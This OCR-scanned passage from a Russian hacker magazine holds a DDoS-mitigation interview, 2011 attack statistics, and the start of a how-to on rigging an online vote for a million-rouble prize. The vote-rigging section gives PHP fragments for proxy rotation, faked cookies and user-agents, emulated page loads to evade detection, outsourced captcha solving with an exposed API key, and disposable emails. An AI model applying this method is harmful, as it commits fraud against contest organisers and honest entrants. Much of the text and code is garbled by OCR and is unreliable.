мощью настроек ірІаЫез или файервола все 
ІР-адреса, кроме наших. 

Как только перестраивается БМБ, начинает- 
ся фильтрация. А дальше происходит самое 
интересное — обучение фильтров. Обычно мы 
задаем для себя планку: после двух часов под 
атакой ресурс клиента должен начать рабо- 
тать. И в целом ее выдерживаем. 

Система защиты нашего сервиса Огаіог 
основана на множестве математических по- 
строений. Как обычно отвечает Яндекс на во- 
прос «а как у вас поиск устроен?»? Да просто! 
Берем текст, токенчики, разделители, строим 
индескы, ранжируем. У нас примерно то же 
самое, только мы решаем задачу по анализу 
и фильтрации трафика. Ее решением занято 
множество людей. 

Поведенческий анализ — один из наиболее 
эффективных методов фильтрации трафика. 

Мы рассматриваем сайт как дерево перехо- 
дов. В узлах дерева находятся странички, а в 
ребра мы закладываем вероятность перехода 
и задержку при переходе. В основе лежит 
тот простой факт, что роботы и люди видят 
веб-страницы по-разному. Когда времени 
на обучение достаточно, люди «натаптывают» 
в этих переходах определенные уплотнения 
— тропинки. Всё посетители, которые из них 
выпадают, с той или иной вероятностью явля- 
ются роботами. Вроде бы всё просто. С другой 
стороны, если прикинуть, какие объемы па- 
мяти и вычислительные ресурсы понадобятся 
для обработки, ты поймешь, что, наверное, 
при текущих вычислительных мощностях это 
не так-то просто. 

Если клиент приходит к нам уже под атакой, 

обучаться на атаке... не невозможно, но слож- 
но. Часто это требует мониторинга со стороны 
инженера. Именно поэтомуза подключение 
под атакой мы вынуждены брать некоторую 
дополнительную плату. 

Мы рекомендуем подключаться к нашей сети 
до ОБоБ-атаки. Конечно, мы стараемся мини- 
мизировать время обучения под атакой. У нас 
оно составляет не неделю, как у Сізсо БиагсІ 
(это наш железный конкурент, который снят 
с производства), а всего несколько часов. 

Любой, кто скажет, что {аізе розіііѵе у него 
ноль, — шарлатан. Ложные срабатывания 
(когда в черные списки попадают легитим- 
ные посетители), к сожалению, неизбежны. 
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Борьба с ББоБ-ом глазами НідЫоасІ І_аЬ 



Хотя бы потому, что есть прокси, есть ЫАТ'ы, 
есть просто люди, которые ведут себя не как 
обычные пользователи. Классический пример 
— администраторы сайтов. Администратор 
может нагрузить сервер, как 30, 40 и даже 100 
пользователей. 

К Сізсо ОиагсІ у нас была одна претензия: 

когда к нему подключаешь атакуемый сервис, 
то независимо оттого, есть там инженер или 
нет, первые сутки сервис работает так, что 
лучше бы он не работал вообще. Отсюда стало 
ясно, что от ОйоБ-атак невозможно защищать 
на прикладном уровне, не понимая семантику 
протокола приложения. Семантический анализ 
обязателен, как и поведенческий. 

Мы отчетливо понимаем, что «серебряной 
пули нет»: то, что будет хорошо работать 
в одних ситуациях, не будет работать в дру- 
гих. Классификатор (Эгаіог — это сложный 
набор алгоритмов, которые образуют систему 
голосования. Инструментарий мы стараемся 
развивать и дописывать и, надеюсь, найдем 
еще какие-нибудь эффективные методы в бли- 
жайшее время. Кое-какие задумки уже есть. 

Примерно в один миллион долларов обой- 
дется железка от АгЬог, способная почистить 
10 Гбит. Плюс человек, плюс канальные 
емкости... При этом атаки скоростью выше 10 
Гбит/с мы наблюдаем примерно раз в месяц- 
полтора. 

Мы склонны выделять два типа полос: актив- 
ные и пассивные. В активноц полосе можно 
терминировать и проанализировать любое 
ТСР-соединение и принять по нему решение. 
Полоса пассивная — это полоса, для управле- 
ния которой нужно задать бит-маску, по ко- 
торой будет резаться трафик. Таким образом, 
что-то интеллектуальное там порезать нельзя. 
Если говорить об активной полосе, то почти 
все наши поставщики трафика при необходи- 
мости блокируют ІЮР с определенного адреса, 
все ІСМР или ІСМР по определенной сигнатуре. 
На такой полосе мы спокойно проживали 57 
Гбит. Уверены, что можем проживать и больше. 
Такие атаки не вызывают особых проблем, 
кроме необходимости оплачивать эту полосу, 
то есть мы говорим о цифре более 100 Гбит для 
пассивной полосы. Как следует из ситуации 
с 00о5-атаками на российском рынке, этого 
вполне достаточно. 

Преимущество Огаіог (как сервиса) перед 
купленным АгЬог состоит в том, что наше ре- 
шение не является точечным. Сеть построена 
по ВЗР-АпуСазС мы выбираем для установки 
точек исключительно магистральных опера- 
торов. Мы не ставим точки на риЫіс ехсЬапде 
просто потому, что это не гарантирует качества 
сервиса. Сеть развивается благодаря нашим 
собственным алгоритмам моделирования. Мы 
строим ее так, чтобы можно было распреде- 
лять нагрузку на элементы сети более-менее 
равномерно. 



Внутри точки присутствия система тоже мас- 
штабируема. Точка — это не одна «железка», 
их несколько. Есть карантинное оборудова- 
ние, на которое «приземляются» некоторые 
атаки. 

Мы создали модель, позволяющую мате- 
матически рассчитать, как распределит- 
ся трафик по интернету при появлении 
определенных анонсов ВСР. Это позволяет 
нам гармонично развиваться и строить сеть, 
которую действительно можно балансировать 
по узлам. 

Мы не завязаны на одного оператора связи 

и стараемся распределять риски по всем опе- 
раторам, с которыми работаем. 

Мы долго пытались разобраться с ТСР/ІР- 
стеком, смотрели на Ргее В50 и Ыпих и в итоге 
пришли к выводу, что стек в его теперешнем 
состоянии нам совершенно не нравится. 

У нас есть своя облегченная версия ТСР/ІР, 
которая очень хорошо себя ведет на текущих 
короткоживущих протоколах, быстрых ТСР- 
соединениях. 



КОГДА 

РАЗРАБАТЫВАЛСЯ 

ТСР/ІР-СТЕК, 

НИКТО НЕ ДУМАЛ, 

ЧТО ИНТЕРНЕТ 

РАЗРАСТЕТСЯ 

ДО ТАКИХ МАСШТАБОВ 



Мы не скрываем, что узел фильтрации рабо- 
тает под управлением І_іпих. Линкус — это 
такой контейнер, в котором осуществляется 
управление платформой и выполняются мате- 
матические преобразования, необходимые для 
поведенческого анализа. Существенная часть 
ТСР-стека живет в самой ТСР-карте, поэтому, 
собственно, у нас получились такие хорошие 
показатели скорости\обработки пакетов. Один 
наш узел фильтрации в состоянии перелопа- 
тить 6 Гбиттрафика. 

От атак базового уровня защититься можно. 

Для этого нужно обязательно иметь выделен- 
ный хостинг, а также возможность скомпилиро- 
вать модули и свою версию веб-сервера. Статей 
на этутему написано много, и я, наверное, 
отошлю вас к своей статье 2008 года (найти 
ее можно в блоге на ЫдЫоасІІаЬ.гіі). Это одна 
из первых статей, в которой доступно изложено, 
что и как следует сделать. Также рекомендую 
ознакомиться с презентацией «Практическое 



руководство по выживанию в БРоЗ», которую 
мы показывали на НідЫоасІ++ в 2009 году. 

Мы пытались писать статьи на Хабре и рас- 
сказывать на отраслевой конференции, как 
самостоятельно защититься от атак базового 
уровня. Но, к сожалению, это не возымело 
никакого эффекта. 



0 БОТНЕТАМ 



0йо5 — это один из способов монетизации 
ботнета, но далеко не самый прибыльный. Еще 
есть спам, фрод, скликивание рекламы и так 
далее. 

Я перечислил свойства ботнета на слайде для 
одной достаточно старой презентации. Когда 
я делал тот слайд, он казался мне абсолютно 
правильным: 

1. Жадность. Ботнет старается нанести при- 
ложениям как можно больше вреда за еди- 
ницу времени. 

2. Ущербность. Ботнет не являет браузером. 
Это некий НТТР-стек, встроенный в червь. 
Как правило, он не умеет ставить коррект- 
ные заголовки, не обладает Э5-движком 
или обладает в ограниченном виде. 

3. Самосохранение. Ботнет — ценный ресурс, 
и любые действия, приводящие к сокраще- 
нию его размера приносят прямые финан- 
совые убытки атакующим. Ботнет старается 
не производить действий, которые могли 
бы его демаскировать и отразиться на ма- 
теринской системе. 

4. Транснациональность. Ботнеты раскиданы 
по всему «шарику». 

5. Конечность. 

Пару лет назад мы первый раз увидели 
медленный ботнет, который не был жадным... 

Он делал один абсолютно легитимный запрос 
раз в пять минут. Мы удивились, но при этом 
ботнет, насчитывавший 75 тысяч ботов, всё же 
доставлял проблемы. Попробуйте-ка отфиль- 
тровать ЭТО. 

Сейчас из всех пунктов, перечисленных 
выше, остался только один — желание 
ботнета самосохраняться. Ботнеты уже давно 
не жадные, не тупые и не ущербные. Сейчас 
мы имеем дело с полноценными минимизиро- 
ванными веб-браузерами с Эаѵа-скриптами, 
редиректами, соокіез. 

Раздать команды членам 20-тысячного бот- 
нета с учетом того, что инициатором соедине- 
ний является сам бот, — задача не самая три- 
виальная. Как правило, контрольные панели, 
к нашему удивлению, пишутся на том же самом 
І_АМР Эіаск (Ыпих, АрасЬе НТТР Бегѵег, Му5СІІ_ 
и РНР). До 2010 года разворачивание ботнета- 
пятитысячника в направлении ресурса жертвы 
занимало 30-40 минут. 

В 2010-м управление ботнетами начали орга- 
низовывать с помощью Р2Р. Ребята стали про- 
сто супербыстро раздавать команды: в течение 



ХАКЕР 02/157/2012 



027 





СОѴЕК 5Т0ГСѴ 



пяти-шести минут ботнет, насчитывающий Ій- 
20 тысяч ботов, может распространить команду 
внутри себя и развернуться на ресурс. 

Ботнеты стараются как можно более точно 
имитировать поведение пользователей, чтобы 
затруднить их обнаружение и фильтрацию, вы- 
деление тела ботнета и блокировку. 

В последние три месяца особой популярно- 
стью пользуется ботнет МіпегВоІ, который 
добывает ВііСоіп. Он приходит на титульные 
страницы без реферера, случайным образом, 
переходит по ссылкам и действительно созда- 
ет проблемы для решений вроде Сізсо и АгЬог. 
Они не в состоянии отфильтровать МіпегВоІ, 
потому что он не обладает ни одним из тех 
изъянов, на обнаружение которых ориентиро- 
ваны эти решения. 

Ботнеты также перестали быть транснацио- 
нальными — загрузки легко продают по регио- 
нам. Первый раз мы такое увидели в 2009 году, 
когда к нам «пришел» ботнет на 1500 голов, 
и все чистое СНГ. 

«Засыпающий ботнет» — так мы называем 
довольно модную атаку. Ботнет обнаруживает, 
что он весь зафильтрован, раздает команду 
и централизовано прекращает атаку. После 
этого рандомный член ботнета посылает 
тестовые запросы в ожидании, когда фильтр 
отключится. Как только он отключается, атака 
в течение трех-пяти минут возобновляется 
в полном объеме. Это опасно тем, что подобная 
атака может длиться бесконечно — никаких 
ресурсов, сточки зрения ботовода, она не по- 
требляет. 

Разные ботнеты здорово отличаются друг 
от друга. Сама техника атак постоянно меня- 
ется. 

С ботнетами-миллионниками наблюдается 
очень интересная ситуация. В последние не- 
сколько лет существенно возросло количество 
тех, кто хотел бы обзавестись своим ботнетом. 
Простой эксперимент: поставим ѴѴіпсІоѵѵз ХР 
5Р1 на честный ІР-адрес. Сколько он проживет 
до того, как на него что-нибудь «приземлит- 
ся», даже если не открывать веб-бразуер? 
Максимум пять минут. Есть много команд, 
которые борются за увеличения тела ботнета, 
а само предложение уязвимых систем крайне 
ограниченно. Соответственно, количество 
ботнетов растет, а вот их размеры медленно, 
но верно снижаются. Ботнеты уже начинают 
пересекаться, то есть один компьютер являет- 
ся членом нескольких ботнетов сразу. 

Ботнетов на десятки миллионов компьютеров 
становится всё меньше и меньше. Ими обла- 
дают совсем уж джедаи. :) 

У нас нет возможности делать реверс- 
инжиниринг кода ботнета, потому что 
у нас нет административных возможностей 



по изъятию его тела и, самое главное, у нас 
нет своих специалистов, способных делать 
обратный инжиниринг кода, ориентированного 
на ѴѴіпсІоѵѵз-системы. 



іО НІ6НІ_0А0 І_АВ 



Идея заниматься ББоБ-атаками возникла 
у нас еще в МГУ. Мы посмотрели, как обстоят 
дела с устойчивостью к внешним воздействи- 
ям у правительственных ресурсов и с устой- 
чивостью веб-приложений в России в целом. 
Стало понятно, что наши услуги, скорее всего, 
будут востребованы. Ведь отвалившийся 
интернет-магазин — это проблема только 
его владельца, но отвалившаяся налоговая 
инспекция — это проблема всей страны. 

Начать исследования — это была моя личная 
инициатива. Университет предоставил инфра- 
структуру, я на свои деньги закупил оборудо- 
вание. 

В 2008 году у нас возникла идея. В 2009 году 
появилась бета-версия продукта, которую мы 
обкатывали в режиме открытой беты большую 
часть 2010 года. Мы принимали у себя на пло- 
щадке любой терпящий бедствие проект. 

Стало ясно, что с этой задачей мы справляемся 
неплохо, даже располагая ограниченной уни- 
верситетской инфраструктурой. Мы, к примеру, 
помогли газете «Ведомости». Было здорово. :] 

К коммерциализации нас подтолкнула необхо- 
димость: в июне 2010 года, когда максимальная 
емкость университетской сети составляла 10 
Гбит, на нас упала атака в 12,5 Гбит. Атака по- 
казала, что фильтры справляются, и мы легко 
сможем преодолеть и более мощную атаку, 
но нужны канальные емкости. Это ценный и до- 
рогой ресурс, но проигрывать тоже не хочется... 
У нас были какие-то свои накопленные сред- 
ства, на которые и были закуплены канальные 
емкости. Также было закуплено дополнитель- 
ное оборудование. 

Нам повезло с запуском — у нас был замеча- 
тельный стресс-тест. То есть 1 сентября я по пла- 
ну как раз поставил последнюю точку входа, а 2 
сентября к нам пришел Хабрахабр под атакой 6 
Гбит. Мы получили бесплатный стресс-тест. 

Трафик — это одна из наших главных статей 
расходов. Его тратится не просто много, а очень 
много. 

Компания работает в нескольких направле- 
ниях: мы разрабатываем на заказ высокона- 
груженные веб-приложения и консультируем 
по вопросам их создания. Второе направление, 
самое перспективное для нас, самое динамич- 
но развивающееся, — это наш «коробочный» 
продукт, система фильтрации трафика Огаіог. 

В него мы инвестируем практически всё, что 
зарабатываем. 

На данный момент в нашей компании работа- 
ет 12 человек. В нетехнический штат входят 



восемь инженеров и четыре других сотрудни- 
ка. Двое из них внештатники из Москвы. В на- 
чале года, если всё пойдет хорошо, мы хотим 
пригласить в компанию еще двух инженеров. 
Также как и Яндекс, мы ищем математиков, 
которые могут программировать, работать 
с данными (структурированным и плохо струк- 
турированными). 

К сожалению, мы не занимаемся реверс- 
инжинирингом, но видим, что каждая атака 
имеет свою сигнатуру и логику. 

Мы существуем уже год. Это был не самый 
легкий год. В какие-то моменты было очень тя- 
жело и финансово, и морально. Но за это время 
мы выяснили, какие вопросы возникают при 
эксплуатации сервиса, поняли, как формиро- 
вать тарифную стеку. Поскольку услуга новая, 
никто не знает, как ее продавать. Все предло- 
жения на рынке имеют те или иные изъяны. 

НідЫоасІІаЬ прибыльна. В этом году мы плани- 
руем проводить серьезные технические раз- 
работки — будем строить новую версию своих 
специализированных сетевых процессоров 
— и активно развивать партнерство со всеми 
заинтересованными компаниями: хостинг- 
компаниями, телекомами. 

Одна из наших целей — обеспечить защиту 
для мелкого бизнеса. Это самая незащи- 
щенная от атак прослойка. Многие компании 
берут за защиту от 00о5-атак от 50-100 тысяч, 
и, если мелкий бизнес столько заплатит, он 
разорится. Для предприятий малого бизнеса 
у нас есть специальный тариф — 5000 рублей. 
Но это не значит, что по более низким расцен- 
кам мы работаем хуже. На всех наших тарифах 
используется одна и та же система, качество 
фильтрации везде одинаково. 

Мы предельно аполитичны. Во время выборов 
нашими клиентами были «Слон», ЫеѵѵТітез, 
доіоз.огд, «Эхо Москвы», «Новая газета» СПБ, 
РогЬез, РиЫіс РозЦ «Ведомости»... В общем, 
мы приняли под свое крыло всю оппозицию. 

Но даже с большим удовольствием мы бы по- 
работали с тем же ЦИК. Но ЦИК к нам не при- 
шел. 

Единственный критерий для нас — ресурс 
должен обязательно соблюдать все законы. 

Мы принципиально не связываемся с сайтами, 
содержащими пиратский контент, имеющими 
нацистскую или порнографическую направ- 
ленность, с фарма-партнерками и прочей 
интернет-грязью. 

Мы подумали, что если бы нам удалось соз- 
дать систему, построение и функционирова- 
ние которой обходилось бы дешевле, чем про- 
ведение атаки, способной убить эту систему, 
то мы бы ликвидировали экономическое плечо 
атаки. Атаковать стало бы невыгодно. Исходя 
из этого, мы и строили идеологию развития на- 
шего решения. □С 
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Формула 00о5 



В прошлом году для многих стал ясен неожиданный факт: если какой-то сайт нужно 
положить, то это вполне можно устроить. Сколько ОйоБ-атакустроивается за год 
и насколько они эффективны - разбираемся с цифрами от НідбІоасІІаЬ. 




ѵ 

Компоненты РОоЗ-атаки 




производимый 

эффект 




1861 ботов 
- средний размер 
ботнета 




56 Гбит/с - максималь- 
ная 

мощность 

атаки 







ЭРоБ - это метод 
конкурентной 
борьбы 



Статистика ББоБ-атак в 2011 году 



Какие цели 
у атакующих? 




Всего было 1905 
атак 



- &іѣ % 

340 атак 
без ботов 



Самые мощные атаки 




486 ч. - максимальная 239 991 - количество 
продолжительность ботов с самом большом 

атаки ботнете 

Кого чаще всего ББоБ-ят? 





Самые продолжительные Наибольший суммарный 

атаки были на магазин трафик - магазин 

кедровых бочек :) магнитных игрушек 




34 атаки 
мощностью 
выше 1 ГБ/с 



Атаки по месяцам: 
Январь 437 
Февраль 392 
Март 303 
Апрель 87 
Май 22 
Июнь 85 
Июль 103 
Август 89 
Сентябрь 52 
Октябрь 85 
Ноябрь 143 
Декабрь 107 



реклама 



политика 




убеждения 




деньги 



*ДАННЫЕ НА СЕРЕДИНУ ДЕКАБРЯ 2011 
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Как накрутить 

миллион 



ПОЛНЫЙ ГИД 
ПО НАКРУТКЕ 
ОНЛАЙН-ГОЛОСОВАНИЙ 

Конкурсы с голосованием — 
модный тренд. Они привлекают 
большое количество 
посетителей, а трафик, как 
известно, это деньги. Особый 
интерес вызывают конкурсы, 
где за победу предлагаются 
лакомые призы. В этой статье 
я хочу рассказать о довольно 
своеобразном способе участия 
в подобных опросах. 



ПРЕДЫСТОРИЯ 



Как-то раз, глубокой ночью, когда все нормальные люди уже спят, 
я сидел и о чем-то яростно дискутировал с другом в аське. В этот 
момент ко мне постучался клиент, который предложил плевую, 
на первый взгляд, задачу, суть которой заключалась в накрутке 
определенного количества голосов в одном онлайн-голосовании. 
Само голосование проходило за лучший короткометражный автор- 
ский фильм. Уже имея опыт накручивания всевозможных счетчиков, 
я сначала подумал, что потребуется набросать очередной скрипт 
из пары запросов на с11Р1_, проходящих через прокси-сервер. 
Сомнения закрались, когда я увидел главный приз конкурса — один 
миллион рублей. 

Тут мне стало интересно, к каким методам защиты от накрутки 
прибегла администрация сайта при таком существенном спонсиро- 
вании. Ниже — мой отчетотом, какя последовательно решал про- 
блемы, необходимые для реализации эффективного накрутчика. 



РАЗВЕДКА 



Сразу предупрежу, что в подобных голосованиях отслеживается 
ІР-адрес каждого запроса, но подробно рассматривать это проблему 
мы не будем. 

Существует довольно много способов добыть свежие прокси, а с 
технической точки зрения смена прокси для выполнения нового за- 
проса решается всего одной строкой с с11Р1_: 



спз 

На нашем диске 
ты найдешь все 
скрипты и функции, 
описанные в статье. 
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Как накрутить миллион 



сиг1_зе1:ор1;($с л СІЖІ_ОРТ_РКОХѴ, $ргоху_асІсІге5 5) ; 

Разработку накрутчика всегда стоит начинать с разведки. 

Я решил не изменять этому правилу и, прежде чем голосовать, 
запустил свой снифер. Для идентификации нас как уникального 
посетителя сайт сначала ставил в куки банальную сессию. Затем 
ресурс предлагал указать возраст для подтверждения совершен- 
нолетия (скорее всего, потому, что некоторые фильмы были «для 
взрослых»). 

Посмотрим на это с точки зрения накрутки: скрипт каждый раз 
проверяет дату рождения, поэтому было бы глупо производить на- 
крутку с тысяч ІР-адресов с одинаковой датой рождения. А значит, 
первое, что мы должны предусмотреть, — это граббинг сессии 
и рандомную генерацию даты рождения в соокіе. Для этого в самом 
начале нашего скрипта мы объявим глобальную переменную с ра- 
нее сгенерированной датой в кукисах: 

$соокіе зезБІоп = аггаѵ( 

'ВІКТНРАУ=' .гап(Д(1.29 ). .гапгі(1Л2). .гап(Д(196Ѳ.1985). 

' І5_180І_0ЕК=1 ' , 

' І_АІ\ІС=еп ' 

Теперь, после того как мы подтвердили, что уже взрослые 
дядьки, нам следует зарегистрироваться. Переходим на страни- 
цу регистрации и видим, что нас просят ввести имя, фамилию, 
е-таіі, на который придет активационный код, и текст с капчи. 
Данные для первых двух полей, а именно фамилию и имя, мы тоже 
должны генерировать каждый раз разные, так как 20 тысяч голо- 
сов от Петра Сидорова немного насторожат администратора. :) 

Имена и фамилии легко достать в интернете или спарсить 
самому с какого-нибудь сайта имен и фамилий. А вот с активаци- 
онным кодом и капчей придется повозиться. Хорошо, заполняем 
форму, нажимаем «Зарегистрироваться» и топаем на мыло. Там 
нас ждет письмо со ссылкой на подтверждение регистрации. По- 
сле активации аккаунта нам следует авторизоваться, то есть зай- 
ти на страницу авторизации и отправить логин и пароль. При этом 
мы получаем в кукисах вторую сессию, отвечающую за доступ 
к аккаунту. Затем нужно перейти на страничку видеоролика, ко- 
торый мы накручиваем, и нажать кнопочку «Голосовать». Запрос 
передается через А)ах, что немного ускоряет процесс накрутки. 

В принципе, это все. Но не забываем, что на кону целый миллион, 
поэтому нам нужно учесть все детали и мелочи, чтобы накрутку 
нельзя было заметить. 



Емайп: ъвдкдотрр 

П-арол и и; «Міішу: СМІ ЗуІ \іЫ Ш 

Паралич «йту: іч 

От крупно письма (17:37)— 

Поник ндрн тификдтпрд пп-лілонатрпн (17: 30). . . 

Идрміификдтпр ішпьаоіитыін найден: ' 

I І::-і г лк ки,ч..і иятшыции (17:30),,. 

Кип іжшшцпн Німідсл. Ого* фо К Ы 
Дягнмцин ры ни рицин (17:38)... 

Загрузка страницы успешней акт«иншіи (І?:ЗВ}.._ 

ПФпывд ^іториэоадтосй (17:39),,- 

Ашоринция прошла утешна, загрузка гпэпно>й страницы (17:34)... 

РН.Р5ЕЕЕ ІП^И В Ьл.ЬО л Й В 71 1 ЙД ? 

вгетн&ау-э-т-іие,- Т5 иэоьосй-іл 

Открытие страницы с йцдео-фЛюм (17:40)... 

Посылка г опроса ( 1 7 -4 1 }. . 

Г ипік. гкнлйм, ьжгины: 707 

Робо-і а Слриіі т закончено. Нігшнйвй иикл снова, .. 



Статус работы накрутчика 




Панель для управления сервисом для распознования САРТСНА'ей 



НИКАЛЬНОСТЬ ЗАГОЛОВКОВ 



В любой накрутчик сразу же хочется добавить многопоточность. 

Но данный случай, скорее, представляет собой исключение из пра- 
вил, и многопоточность нам только помешает. Если проголосо- 
вать в одну секунду тысячу раз, а потом весь день не голосовать 
вообще, это будет слишком подозрительно. Поэтому мы прибегнем 
к поочередному голосованию, во время которого к тому же будем 
делать паузы. 

Вдобавок следует отметить, что браузер (заголовок ІІзег-Адепі) 
тоже нужно генерировать всегда рандомно, так как для пущей 
достоверности у всех ботов должны быть разные «браузеры». Для 
этого у меня давно подготовлен скрипт с большим количеством 
юзер-агентов, который ждеттебя на нашем диске. Достаточно про- 
сто добавить две строки: 

Іпс1ис1е( ' . /изега^егтЕБ . ИЬ . рИр ' ) ; 

$сІі05еп_и5ега§еп1: = сбоовеВгомБег ( ) ; 

Таким образом, мы получим рандомный браузер из 150 воз- 
можных. Идем дальше. Сайт сразу устанавливает сессию, которая 
потом передается в каждом запросе через соокіе. Поэтому первое, 
что нам нужно сделать при работе с сайтом, — это придумать, под 
какой браузер мы будем маскироваться (ІІзег-Адепі), и получить 
сессию, чтобы потом вставлять ее в каждый запрос. 

В с11Р1_ есть возможность манипулировать соокіе-записями, 
но я не люблю этот способ и сохраняю куки в глобальной перемен- 
ной, которая доступна из всех функций. Для этого просто составля- 
ем запрос с предустановленным юзер-агентом к главной странице 
сайта, получаем куки, которые возвращает сервер, и сохраняем их 
в переменной для дальнейшего использования. 



ЗАГРУЗКА ВСЕЙ СТРАНИЦЫ 



Еще один момент, который может показаться излишним, — это вы- 
полнение абсолютно всех запросов, которые выполняет браузер. Воз- 
никает соблазн отправить минимум запросов сданными. Но это было 
бы ошибкой. Почему? Потому, что на сайте может действовать такой 
способ выявления накрутки, как, скажем, учет хитов по картинке. 

Это означает, что количество загрузок, например, картинки 
видеоролика должно приблизительно равняться количеству про- 
смотров этого видео. Количество посещений всегда должно превы- 
шать (раза в два-четыре) количество голосов. Таким образом, мы 
будем не только накручивать голоса с помощью левых аккаунтов, 
но и эмулировать «ботов», просматривающих видео. Лично я взял 
соотношение 1 : 3, чтобы на три просмотра приходился один голос. 
Но если грузить только страницу просмотра видео (накручивать 
количество просмотров), то нужно также не забывать загружать 
и весь остальной контент, то есть картинки, ЗаѵаЗсгірІ-файлы, 
таблицы стилей и всё-всё-всё, вплоть до иконки сайта. А как 
иначе? Для 100 голосов нужно 1000 посещений, а если при 1000 
посещений картинка видеоролика будет загружена всего 20 раз, то 
это вызовет явные подозрения. 

Каким же образом можно эмулировать абсолютно всю загрузку? 
Ведь для этого необходимо парсить страницу, скрипты, таблицы 
стилей и все остальное. Нет, парсить мы ничего не будем, точнее, 
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Логи НТТР-снифера 

будем, но не страницу. Все можно сделать проще. Достаточно 
лишь воспользоваться плагином ЫѵеНТТРНеасІегз в браузере 
МогіІІа Рігеіюх (или же сервисом Орега ОгадопЛу из могучей Оперы) 
и открыть с его помощью страницу, загрузку которой мы хотим 
эмулировать. На выходе мы получим длинный лог всех обращений 
ко всем файлам, которые загрузил браузер. Сохраним этот лог 
в файле и напишем две функции. 

Первая будет парсить этот лог-файл и возвращать нам массив 
из значений, где адресом загружаемого файла служит ключ, 
а значением — хидер текущей загрузки, причем с предустановлен- 
ными куки (сессией) и браузером, так как куки и браузер должны 
меняться при каждом голосовании (поскольку объем журнала 
крайне ограничен, советую прямо сейчас найти на нашем диске 
соответствующую функцию и изучить ее). После сохранения лога 
в файле и вызова вышеупомянутой функции в виде 

$1із1: = раг5еКецие51:5( 

біе ^е1= согтЕегтЕБ ( ' . /іпсіех тар . 1:х1= ' ) . 

$сНо5еп_у 5ега§епі: . 

$соокіе) ; 

мы получим массив из всех запросов, которые выполнил брау- 
зер при загрузке страницы. 

Вторая функция называется сигІМиіШ) и отвечаетза выполне- 
ние этих запросов. Здесь мы как раз вполне можем использовать 
многопоточность, поскольку браузер умеет загружать файлы 



многопоточно (снова смотри диск). Эта функция принимает массив 
ссылок и массив шапок (Ьеасіегз), которые впоследствии загружа- 
ются многопоточно, что ускоряет процесс. 

Также можно опционально выключить/включить загрузку самих 
файлов, оставив только загрузку шапки, либо просто посылать 
запросы, ничего не загружая. Последний параметр функции позво- 
ляет загрузить только определенный элемент, если нам не нужны 
все остальные. Открою тебе небольшую тайну: это пригодится при 
загрузке страницы регистрации, а именно при загрузке файла 
капчи. 



ИЗВЛЕКАЕМ САРТСНА 



Чтобы эмулировать действия пользователя, для начала мы должны 
зайти на главную страницу. Сделаем это с помощью следующего 
кода: 

-РипсТіоп 1оасІІпсІехП{ 

^ІоЬаІ $сІі05еп_и5ега§еп1: л $соокіе_5Ѳ55Іоп; 

$1іб 1: = раг5еКеяиез1:5( 

б1е_§е1:_соп1:еп1:5( ' ./Іпс1ех_тар.1:х1: ' ) л 
$с1поБеп_и5ега§еп1: л 

'Соокіе: 1 . ітрІосІеС; $соокіе_5Ѳ55Іоп) V. 

$1іпк5 = аггауП; $ИеасІ5 = аггауП; 

-Рогеасб ($1 іб 1= аз $ 1іпк => $ІіеасІ){ 

$1іпк5[] = $1іпк; 

$ІіеасІ5[] = $ІіеасІ; 

} 

$ра§есІ = сМ($1іпк5, $ИеасІ5 ^ 1 , 1); 

ь_ 

Как видно по вышеприведенной функции, файл іпбех_тарТхІ 
как раз и представляет собой лог, созданный с помощью аддо- 
на к Рігеіюх при загрузке всей страницы. Этот лог, кстати, также 
следует немного обработать вручную, так как загружать, например, 
рекламу Гугла или файлы, размещаемые на других сайтах, не име- 
ет смысла. С главной страницы перейдем на страницу регистра- 
ции. За некоторыми отличиями функция для захода на страницу 
регистрации будет похожа на предыдущую. Нам нужно подготовить 
еще один лог-файл с помощью ЫѵеНТТРНеасІегз и поправить его, 
а также заменить строку 

$ра§есІ = сМ($1іпк5. $ІіеасІ5. 1. IV. 

на 

$ра^есІ = сМ($1іпк5. $беасІ5. 1. 1. ' сарІісИа . рИр ' V. 

1І5І= ($с_иг! , $5ІсП = ехрІосІеС 'саріісііа _зісІ= ' . $1іпк5[11]У. 
геНигп аггау( 

' 5ІСІ ' $5ІСІ ^ 

'іта§е' Ьазе64_епсосІе($ра§есІ [11] ) 

); 

В данном случае будет эмулироваться загрузка всех элемен- 
тов, а картинка капчи даже вполне успешно вернется. $Мпкз[1 1] 
и $радесІ[11] — это ссылка и значение запроса для 12-го элемен- 
та загрузки, а именно капчи, соответственно (рассчитывается 
на основе порядка следования файлов в логе снифера). Из ссылки 
выдирается зісі, к которому привязано значение текста с капчи. 
Далее нужно разгадать капчу. 

В этом нам поможет известный сервис апіідаіе.сот, который 
за символическую плату ($1 за 1000 изображений) предлагает 
решить капчи вручную с помощью армии китайцев. В моем случае 
АРІ-функция распознавания, представленная на официальном 
сайте, немного модифицирована. В ней я указал только путь к со- 
храненному файлу капчи и ключ доступа: 

$сар1:сІіа = 1оасШе§(); 
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Как накрутить миллион 



$1оса1 = тсІ5($сар1:сІіа[1іта§е ' ]) ; 

$ыгі1=е_с = -РорепС ' . /сар1=сІіа5/ ' .$1оса1. ' .ір^' . 'мЬ'У. 

^ри1:5 ( $ыгі1:е_с . Ьазе 64_ сІес ос Іе ($с ар1:сІіа[ ' іта§е 1 ] ) ) ; 

•Рс1о$е($мгі1:е_с) ; 



$сгеви11: = гесо§пііе( ’^/сарѣсІіаБ/ ' .$1оса1. 

' ОР§' , ' е12сІс4858Ьас1-Р4ее338с577-Р9сІ30Ѳ ' ) ; 

Теперь у нас есть ответ капчи в переменной $сге5иІІ. 



ПРОБЛЕМА С ПОЧТОЙ 



Далее мы сталкиваемся с необходимостью как-то зарегистриро- 
вать почту, чтобы позже использовать ее для активации аккаунта. 
Само собой, мыло каждый раз должно быть разное. Проблему 
можно решить тремя способами: 

1. За регистрировать аккаунты на бесплатных почтовых серверах, 
например Яндексе или Рамблере. Конечно, если нужно большое 
количество мейлов, то придется использовать крутой автореггер 
или купить кем-то зарегистрированные (опять же с помощью 
автореггера) аккаунты. 

2. Купить домен, схожий по названию с известными почтовиками, 
и настроить скрипт, собирающий в один ящик почту, отправляе- 
мую на все адреса. Таким образом, почта, отправленная на 123Й 
домен. ру и 234йдомен.ру, попадет в один ящик, а значит, можно 
смело генерировать тысяч и адресов. Здесь снова нужны деньги 
изнания. 

3. Самый простой и бесплатный способ — использовать скрипт, 
который любезно подготовлен автором этой статьи. Скрипт ис- 
пользует бесплатный сервис таіііпаіог.пеі для проверки любого 
адреса, уже зарегистрированного в системе. Нам нужно просто 
указать произвольный адрес на доменах этого сервиса, а потом 
зайти (без авторизации!) в соответствующий аккаунт через веб- 
